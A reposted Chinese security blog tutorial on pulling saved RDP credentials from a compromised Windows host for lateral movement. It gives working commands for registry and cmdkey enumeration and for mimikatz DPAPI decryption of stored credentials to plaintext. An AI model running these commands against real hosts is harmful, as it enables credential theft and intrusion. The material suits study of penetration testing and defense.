免责声明:由于传播、利用本公众号李白你好所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号李白你好及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!
李白你好-网安资源社区👇
www.libaisec.com
1►
前言介绍
在授权渗透过程中,如果获取了一台windows的权限,可以尝试去获取该主机保存的远程桌面连接凭证,从而在内网横向中扩大成果。也就是当我们获取一台windows服务器,可以尝试获取本地远程连接的信息甚至可以拿到明文密码,横向移动。
2►
技术细节
reg query "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /s
cmdkey /list
dir /a %userprofile%AppDataLocalMicrosoftCredentials*
mimikatz.exe "privilege::debug" "dpapi::cred /in:C:UsersxuanjianAppDataLocalMicrosoftCredentialsB0B07C74251019634D3D975E183A4D01" exit
mimikatz.exe "privilege::debug" "sekurlsa::dpapi" exit > 1.txt
MasterKey:0541b84285d48012015ae28a75935a53eedcca0423d74e9c34c10a82c6991015f371097e61bc6d927e82a80bbdb0cdcd1e00431a7f93e65a209b7150f80c1eba
mimikatz.exe "privilege::debug" "dpapi::cred /in:C:UsersxuanjianAppDataLocalMicrosoftCredentialsB0B07C74251019634D3D975E183A4D01 /masterkey:0541b84285d48012015ae28a75935a53eedcca0423d74e9c34c10a82c6991015f371097e61bc6d927e82a80bbdb0cdcd1e00431a7f93e65a209b7150f80c1eba" exit
3►
总结
通过密码文件获取guidMasterKey的值,根据guidMasterKey找到对应Masterkey,通过Masterkey进行解密,获取明文。
文章作者:CSDN(keepb1ue)
文章来源:https://blog.csdn.net/qq_36618918/article/details/130677478
4►
原文始发于微信公众号(李白你好):内网横向扩大战果,RDP远程桌面密码凭证获取
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论